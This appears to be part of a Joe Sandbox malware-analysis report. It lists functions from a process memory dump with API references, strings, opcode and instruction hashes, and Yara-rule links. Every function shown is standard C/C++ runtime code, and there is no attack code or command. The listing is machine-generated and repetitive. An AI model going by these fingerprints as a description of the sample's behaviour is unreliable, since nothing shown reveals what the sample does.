Part of subcall function 00E33260: std::_Lockit::~_Lockit.LIBCPMT ref: 00E3328A

codecvt.LIBCPMT ref: 00E37B6F
std::_Facet_Register.LIBCPMT ref: 00E37B86
std::_Lockit::~_Lockit.LIBCPMT ref: 00E37BA6

Strings

vn, xrefs: 00E37B93

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID: vn
API String ID: 712880209-528124057
Opcode ID: bfbb9dc58ecc090189d443f08e679d24edabb99578a309f0cc366ad1ed138fd4
Instruction ID: 881a597bf4b30ed49a0d99bb25daeef2f69b2976daf86e40a7a2398c9c8d6a61
Opcode Fuzzy Hash: bfbb9dc58ecc090189d443f08e679d24edabb99578a309f0cc366ad1ed138fd4
Instruction Fuzzy Hash: CB11E4719046149FCB11AB68D84A7AEBBF6AF84321F11250DF441B7392DBB4AA05C790

Function 00E36775 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E3677C
std::_Lockit::_Lockit.LIBCPMT ref: 00E36786

Part of subcall function 00E33260: std::_Lockit::_Lockit.LIBCPMT ref: 00E3326F
Part of subcall function 00E33260: std::_Lockit::~_Lockit.LIBCPMT ref: 00E3328A

codecvt.LIBCPMT ref: 00E367C0
std::_Facet_Register.LIBCPMT ref: 00E367D7
std::_Lockit::~_Lockit.LIBCPMT ref: 00E367F7

Strings

vn, xrefs: 00E367E4

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID: vn
API String ID: 712880209-528124057
Opcode ID: 9914155dfffbfae365396f37f6dea6ac0bd1751d09e3ec875bbe45f4d55b3e12
Instruction ID: 881cb68bbaaf14ca7d8c04e3bc6aad3910b91c3edff1ae4be5197490b18532f8
Opcode Fuzzy Hash: 9914155dfffbfae365396f37f6dea6ac0bd1751d09e3ec875bbe45f4d55b3e12
Instruction Fuzzy Hash: 5911A272904615EFCB05EF79C94A6AEBFE5AF84320F50545EE411B7382DB749A04CB90

Function 00E35F4A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E35F51
std::_Lockit::_Lockit.LIBCPMT ref: 00E35F5C
std::_Lockit::~_Lockit.LIBCPMT ref: 00E35FCA

Part of subcall function 00E360AD: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E360C5

std::locale::_Setgloballocale.LIBCPMT ref: 00E35F77
_Yarn.LIBCPMT ref: 00E35F8D

Strings

vn, xrefs: 00E35F99, 00E35FBD

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID: vn
API String ID: 1088826258-528124057
Opcode ID: c05498277e347ecb65c6b72c50584b77ba0c236a1e07d1ae5690486e06cdbf63
Instruction ID: a1a3660a331bcfe36fcd577b71a42ca2a03f542b878b2bd17d492cffdd1b4b3f
Opcode Fuzzy Hash: c05498277e347ecb65c6b72c50584b77ba0c236a1e07d1ae5690486e06cdbf63
Instruction Fuzzy Hash: 8B019E72601A10AFC70AAB21D94967D7BA1BF84310F145409E81277392CF386A46CB81

Function 00E4449E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6D1CC867,?,?,00000000,00E566D3,000000FF,?,00E4442E,?,?,00E44402,00000016), ref: 00E444D3
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E444E5
FreeLibrary.KERNEL32(00000000,?,00000000,00E566D3,000000FF,?,00E4442E,?,?,00E44402,00000016), ref: 00E44507

Strings

vn, xrefs: 00E444F6
mscoree.dll, xrefs: 00E444CC
CorExitProcess, xrefs: 00E444DD

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll$vn
API String ID: 4061214504-1791309571
Opcode ID: db843169db05be88f440ff855b93fb54bf07b7e2e7fd0ce98535bdcdaa805b43
Instruction ID: a72fe1b1beffc4723f707f37b9a506f74646b5c7a0441478d061308aed6416e8
Opcode Fuzzy Hash: db843169db05be88f440ff855b93fb54bf07b7e2e7fd0ce98535bdcdaa805b43
Instruction Fuzzy Hash: 04016272A14729EFDB158F51DD05BAFBBB8FB04B16F004A25E811B26D0DBB49908CB90

Function 00E327A0 Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E327AD
std::_Lockit::_Lockit.LIBCPMT ref: 00E327CB
std::_Lockit::~_Lockit.LIBCPMT ref: 00E327EC
std::_Lockit::~_Lockit.LIBCPMT ref: 00E3283C
std::_Facet_Register.LIBCPMT ref: 00E32866
std::_Lockit::~_Lockit.LIBCPMT ref: 00E3287F

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
String ID:
API String ID: 1858714459-0
Opcode ID: e7346c7a14d0b48a1ed43b58c70ee12cfdf75b90bcf9b0c7954e8597e32397a5
Instruction ID: 0ba8a6cd7096b07158b4dc1ce6b6e04db5121a1017bc811afd3300f691042c5c
Opcode Fuzzy Hash: e7346c7a14d0b48a1ed43b58c70ee12cfdf75b90bcf9b0c7954e8597e32397a5
Instruction Fuzzy Hash: 94210632A002118FC715DF18E848A6ABBE1FF95324F14151EE99077362DB35ED4AC7C2

Function 00E3C42A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00E3C421,00E3AB5A,00E39AE6), ref: 00E3C438
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E3C446
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E3C45F
SetLastError.KERNEL32(00000000,00E3C421,00E3AB5A,00E39AE6), ref: 00E3C4B1

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 28556cebfb01016a18e0ff6d90711e978f44f70fca84fa288b380bca97db003b
Instruction ID: df365073d57b3a9bbd990993e214ff73338144a0ff3553b69b2798deb3ea618a
Opcode Fuzzy Hash: 28556cebfb01016a18e0ff6d90711e978f44f70fca84fa288b380bca97db003b
Instruction Fuzzy Hash: 5C01B13321C7216EAB2426757C9E96E2E94EF41B79F31622BF534B20E5EE118C0AD244

Function 00E3C541 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00E3C608
___AdjustPointer.LIBCMT ref: 00E3C62B
___AdjustPointer.LIBCMT ref: 00E3C6C7

Strings

vn, xrefs: 00E3C5A0

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID: vn
API String ID: 1740715915-528124057
Opcode ID: be5011fd7669a015aaf956b04ce786da9243f53e3ef0b7fb57c9f8d059c6d372
Instruction ID: 70dd7beabb38c5434b1ce9cf7965be964461c30dcccf994564c3aba2fc2d809b
Opcode Fuzzy Hash: be5011fd7669a015aaf956b04ce786da9243f53e3ef0b7fb57c9f8d059c6d372
Instruction Fuzzy Hash: A651F272600206AFDB298F14D94ABBA7BE4EF44B14F34742DE84677291D732EC80D790

Function 00E4A0C3 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00E4A14A
__alloca_probe_16.LIBCMT ref: 00E4A20B
__freea.LIBCMT ref: 00E4A272

Part of subcall function 00E47686: HeapAlloc.KERNEL32(00000000,00000001,?,?,00E39E48,?,?,?,?,?,00E32D6E,00000001,?), ref: 00E476B8

__freea.LIBCMT ref: 00E4A287
__freea.LIBCMT ref: 00E4A297

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 2ce6fba181371fdfaeca495170b87045b5a52c974130b916ec27f1334dc3632e
Instruction ID: 4761e1c464f1e28e8323117dd7689e8c3c48807c3b9355ce4095ac5a9a32849a
Opcode Fuzzy Hash: 2ce6fba181371fdfaeca495170b87045b5a52c974130b916ec27f1334dc3632e
Instruction Fuzzy Hash: 6851C372641206ABEF215FA4AC81DBB3BA9EF04364F195538FC08F6250EBB1CD1096A5

Function 00E3C230 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00E3C26F
__IsNonwritableInCurrentImage.LIBCMT ref: 00E3C323

Strings

vn, xrefs: 00E3C33C
csm, xrefs: 00E3C30D

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm$vn
API String ID: 3480331319-2304663376
Opcode ID: ec72e3bf52168c5e8bb3183d9494e980d8397a0e6c356144c29e9863a00da35e
Instruction ID: 6584d7fae5ce03b260f755782f6d4b2735a9525f4cc9e7776993ce5b5a507e35
Opcode Fuzzy Hash: ec72e3bf52168c5e8bb3183d9494e980d8397a0e6c356144c29e9863a00da35e
Instruction Fuzzy Hash: C741B135A002189FCF10DFA9CC88A9EBFF5AF45318F249195E8197B3A2D731E915CB91

Function 00E3D572 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00E3D523,00000000,00000001,00E9997C,?,?,?,00E3D6C6,00000004,InitializeCriticalSectionEx,00E59F88,InitializeCriticalSectionEx), ref: 00E3D57F
GetLastError.KERNEL32(?,00E3D523,00000000,00000001,00E9997C,?,?,?,00E3D6C6,00000004,InitializeCriticalSectionEx,00E59F88,InitializeCriticalSectionEx,00000000,?,00E3D47D), ref: 00E3D589
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00E3C393), ref: 00E3D5B1

Strings

api-ms-, xrefs: 00E3D596

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 69c4619df9c9c8e32639c0e2bb77cbd6262eacb2d01d6ac0bfd2748aac2f7821
Instruction ID: 3056912b3a0eddcea8a6c729122e13b8ce5f44e15b811a70cea9b25163aef2a9
Opcode Fuzzy Hash: 69c4619df9c9c8e32639c0e2bb77cbd6262eacb2d01d6ac0bfd2748aac2f7821
Instruction Fuzzy Hash: 34E09A70688304FAEF111F61ED0AB593F559B01B5AF145420FA0CB84E1DBB1A958DA95

Function 00E4A777 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(6D1CC867,00000000,00000000,00000000), ref: 00E4A7DA

Part of subcall function 00E4CD2A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00E4A268,?,00000000,-00000008), ref: 00E4CDD6

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E4AA35
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E4AA7D
GetLastError.KERNEL32 ref: 00E4AB20

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: bc008a093cfb35bcfb0520a399b92e0b25b09f6876dc2616e3fa06fec2ea7ae0
Instruction ID: 1fd08f3e0de86a79a0e79147bdf409226d94e1a3b169404b04952a55b8923d82
Opcode Fuzzy Hash: bc008a093cfb35bcfb0520a399b92e0b25b09f6876dc2616e3fa06fec2ea7ae0
Instruction Fuzzy Hash: 15D167B5E002489FCB15CFE8E8849EDBBB5FF48314F18452AE856F7352D630A846CB51

Function 00E4D146 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00E4CD2A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00E4A268,?,00000000,-00000008), ref: 00E4CDD6

GetLastError.KERNEL32 ref: 00E4D1AA
__dosmaperr.LIBCMT ref: 00E4D1B1
GetLastError.KERNEL32(?,?,?,?), ref: 00E4D1EB
__dosmaperr.LIBCMT ref: 00E4D1F2

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 4527935f4bfa6717afd756ba4a0814b9e66ee568d2784bb0a750b68f129cbeb7
Instruction ID: 772e0823d105a2542c33614913664425ce754dcefb9f4b22e43ce6acfc259010
Opcode Fuzzy Hash: 4527935f4bfa6717afd756ba4a0814b9e66ee568d2784bb0a750b68f129cbeb7
Instruction Fuzzy Hash: 8721C231608209AFDF21AFA5EC8186BB7E9EF403647105569FD29F7260D770EC40CBA0

Function 00E43878 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1938ef63bca38f03e8afb1673b08947d5b8be8ca8f3f2f53fa994ab76785bd61
Instruction ID: 47996c6290fa71cdc110e30519651c030e7e97669a2fe5b5ec6942b70c441acd
Opcode Fuzzy Hash: 1938ef63bca38f03e8afb1673b08947d5b8be8ca8f3f2f53fa994ab76785bd61
Instruction Fuzzy Hash: 1B21A471600205BFDF24AF75FC8196BB7A9EF883687106514FA15F7154E770EE409B60

Function 00E4E0DC Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00E4E0E4

Part of subcall function 00E4CD2A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00E4A268,?,00000000,-00000008), ref: 00E4CDD6

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E4E11C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E4E13C

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 9be1a3c74284d600bc228c814d429a5c6424fb6bbdc8d15966849a5bd955b06c
Instruction ID: 048bd1cdd74f7c228c0c252d54abb8fc28b1fd61e910e397413dd1d5288ce884
Opcode Fuzzy Hash: 9be1a3c74284d600bc228c814d429a5c6424fb6bbdc8d15966849a5bd955b06c
Instruction Fuzzy Hash: FB11C4B19076157F671627B27D8DCBF6EACEE853997112825F505B1301FE34CD0586B0

Function 00E54CA9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00E53A64,00000000,00000001,00000000,00000000,?,00E4AB74,00000000,00000000,00000000), ref: 00E54CC0
GetLastError.KERNEL32(?,00E53A64,00000000,00000001,00000000,00000000,?,00E4AB74,00000000,00000000,00000000,00000000,00000000,?,00E4B0FB,00000000), ref: 00E54CCC

Part of subcall function 00E54C92: CloseHandle.KERNEL32(FFFFFFFE,00E54CDC,?,00E53A64,00000000,00000001,00000000,00000000,?,00E4AB74,00000000,00000000,00000000,00000000,00000000), ref: 00E54CA2

___initconout.LIBCMT ref: 00E54CDC

Part of subcall function 00E54C54: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00E54C83,00E53A51,00000000,?,00E4AB74,00000000,00000000,00000000,00000000), ref: 00E54C67

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00E53A64,00000000,00000001,00000000,00000000,?,00E4AB74,00000000,00000000,00000000,00000000), ref: 00E54CF1

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: dd2050d0cdbee3624e1608b2bc07f844171ec2b6e02673c1880046134f6fe5a3
Instruction ID: 1978d045d1868f6aebe0bf161801b85d06ffe6c4e2ed86204ae940f8caacfde6
Opcode Fuzzy Hash: dd2050d0cdbee3624e1608b2bc07f844171ec2b6e02673c1880046134f6fe5a3
Instruction Fuzzy Hash: D1F03776002114BFDF221F92DD08A9D7F66FB49366B045C11FE1CB5170DA32886CDB91

Function 00E3835E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

_Fputc.LIBCPMT ref: 00E38437

Strings

vn, xrefs: 00E38416

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: Fputc
String ID: vn
API String ID: 3078413507-528124057
Opcode ID: cec8b6d75371106ff98cd7f6cf6d64d1db1d3679181225e7926a0f73741d3564
Instruction ID: c149c9f0b1348caec84341b0c6aaf3051729a4a02780bc70d422f20dee4fd2e3
Opcode Fuzzy Hash: cec8b6d75371106ff98cd7f6cf6d64d1db1d3679181225e7926a0f73741d3564
Instruction Fuzzy Hash: 55417C7290461AABCF14DF64CA988EEBBF8BF08354F142126F442B7740DB31E945CB90

Function 00E3CB3D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00E3CB62

Strings

MOC, xrefs: 00E3CB74
RCC, xrefs: 00E3CB7C

Memory Dump Source

